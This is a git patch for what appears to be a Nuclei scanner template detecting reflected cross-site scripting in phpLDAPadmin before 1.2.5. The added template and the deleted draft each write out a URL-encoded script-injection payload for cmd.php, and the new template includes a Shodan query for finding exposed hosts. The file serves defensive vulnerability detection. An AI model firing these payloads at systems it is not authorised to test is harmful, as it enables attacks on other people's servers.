From 9c29ff3819e44bd45142e2a694f876dcbb4a16bc Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Tue, 12 Sep 2023 14:54:31 +0530
Subject: [PATCH] complete template update

---
 custom-phpldapadmin-xss                       | 16 -------
 .../other/phpldapadmin-xss.yaml               | 47 +++++++++++++++++++
 2 files changed, 47 insertions(+), 16 deletions(-)
 delete mode 100644 custom-phpldapadmin-xss
 create mode 100644 http/vulnerabilities/other/phpldapadmin-xss.yaml

diff --git a/custom-phpldapadmin-xss b/custom-phpldapadmin-xss
deleted file mode 100644
index 44908e3582..0000000000
--- a/custom-phpldapadmin-xss
+++ /dev/null
@@ -1,16 +0,0 @@
-id: custom-phpldapadmin-xss
-info:
-  name: Custom PHP LDAP Admin XSS Detection
-  author: GodfatherOrwa, herry
-  Reference : https://twitter.com/GodfatherOrwa/status/1701392754251563477
-  severity: medium
-
-http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/phpldapadmin/cmd.php?cmd=template_engine&dn=%27%22()%26%25%3Czzz%3E%3CScRiPt%20%3Ealert(%27Orwa%27)%3C/ScRiPt%3E&meth=ajax&server_id=1"
-    matchers:
-      - type: word
-        words:
-          - "<ScRiPt >alert('Orwa')</ScRiPt>"
-        part: body
diff --git a/http/vulnerabilities/other/phpldapadmin-xss.yaml b/http/vulnerabilities/other/phpldapadmin-xss.yaml
new file mode 100644
index 0000000000..2577f1202d
--- /dev/null
+++ b/http/vulnerabilities/other/phpldapadmin-xss.yaml
@@ -0,0 +1,47 @@
+id: phpldapadmin-xss
+
+info:
+  name: PHP LDAP Admin < 1.2.5 - Cross-Site Scripting
+  author: GodfatherOrwa,herry
+  severity: medium
+  reference:
+    - https://twitter.com/GodfatherOrwa/status/1701392754251563477
+  metadata:
+    max-request: 3
+    verified: true
+    shodan-query: html:"phpLDAPadmin"
+  tags: php,phpldapadmin,xss
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+      - "{{BaseURL}}{{path}}/cmd.php?cmd=template_engine&dn=%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&meth=ajax&server_id=1"
+      - "{{BaseURL}}{{path}}/index.php?redirect=true&meth=ajax"
+
+    attack: pitchfork
+    payloads:
+      path:
+        - 
+        - /htdocs/index.php
+        - /phpldapadmin
+
+    stop-at-first-match: true
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<script>alert(document.domain)</script>"
+          - "No such entry"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200